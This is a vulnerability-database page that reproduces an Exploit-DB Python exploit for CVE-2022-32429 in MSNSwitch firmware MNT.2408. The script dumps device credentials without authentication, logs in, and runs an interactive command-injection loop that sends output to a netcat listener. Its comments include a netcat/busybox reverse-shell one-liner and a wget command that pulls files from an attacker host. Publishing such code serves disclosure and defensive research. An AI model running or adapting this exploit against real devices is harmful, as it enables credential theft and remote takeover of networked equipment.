Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MSNSwitch Firmware MNT.2408 - Remote Code Execution

šŸ—“ļøĀ 11 Nov 2022Ā 00:00:00Reported byĀ Eli FulkersonTypeĀ 
exploitdb
Ā exploitdbšŸ”—Ā www.exploit-db.comšŸ‘Ā 131Ā Views

MSNSwitch Firmware MNT.2408 - Remote Code Execution. Unauthenticated configuration dump. Authenticated command executio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		MSNSwitch Firmware MNT.2408 - Remote Code Exectuion Exploit
11 Nov 202200:00
ā€“zdt
ATTACKERKB		CVE-2022-32429
10 Aug 202220:15
ā€“attackerkb
Circl		CVE-2022-32429
11 Aug 202200:32
ā€“circl
CNNVD		MSNSwitch ęŽˆęƒé—®é¢˜ę¼ę“ž
10 Aug 202200:00
ā€“cnnvd
CVE		CVE-2022-32429
9 Aug 202200:00
ā€“cve
Cvelist		CVE-2022-32429
9 Aug 202200:00
ā€“cvelist
Nuclei		MSNSwitch Firmware MNT.2408 - Authentication Bypass
25 Jun 202601:31
ā€“nuclei
NVD		CVE-2022-32429
10 Aug 202220:15
ā€“nvd
OSV		CVE-2022-32429
10 Aug 202220:15
ā€“osv
Packet Storm		MSNSwitch Firmware MNT.2408 Remote Code Execution
11 Nov 202200:00
ā€“packetstorm
Rows per page
Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)
Google Dork: n/a
Date:9/1/2022
Exploit Author: Eli Fulkerson
Vendor Homepage: https://www.msnswitch.com/
Version: MNT.2408
Tested on: MNT.2408 firmware
CVE: CVE-2022-32429

#!/usr/bin/python3


"""

POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.

Configuration dump only requires HTTP access.
Full RCE requires you to be on the same subnet as the device.

""" 

import requests
import sys
import urllib.parse
import readline
import random
import string


# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST
LISTENER_HOST = "192.168.EDIT.ME"
LISTENER_PORT = 3434

# target msnswitch
TARGET="192.168.EDIT.ME2"
PORT=80

USERNAME = None
PASSWORD = None

"""
First vulnerability, unauthenticated configuration/credential dump
"""
if USERNAME == None or PASSWORD == None:
	# lets just ask
	hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"
	session = requests.session()

	data = session.get(hack_url)
	for each in data.text.split('\n'):
		key = None
		val = None

		try:
			key = each.strip().split('=')[0]
			val = each.strip().split('=')[1]
		except:
			pass

		if key == "Account1":
			USERNAME = val
		if key == "Password1":
			PASSWORD = val

"""
Second vulnerability, authenticated command execution

This only works on the local lan.

for full reverse shell, modify and upload netcat busybox shell script to /tmp:

	shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f
	download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp

ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
"""

session = requests.session()

# initial login, establishes our Cookie
burp0_url = f"http://{TARGET}:{PORT}/goform/login"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}
session.post(burp0_url, headers=burp0_headers, data=burp0_data)

# get our csrftoken
burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"
data = session.get(burp0_url)

csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]

while True:
	CMD = input('x:')
	CMD_u = urllib.parse.quote_plus(CMD)
	filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))

	try:
		hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"

		session.get(hack_url, timeout=0.01)
	except requests.exceptions.ReadTimeout:
		pass

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Nov 2022 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 3.19.8
EPSS0.7572
msnswitchfirmwareremote code executionrceconfiguration dumpauthenticationcommand executionvulnerabilityexploithttpsubnetnetworkcredentialsvendorversioncve-2022-32429
131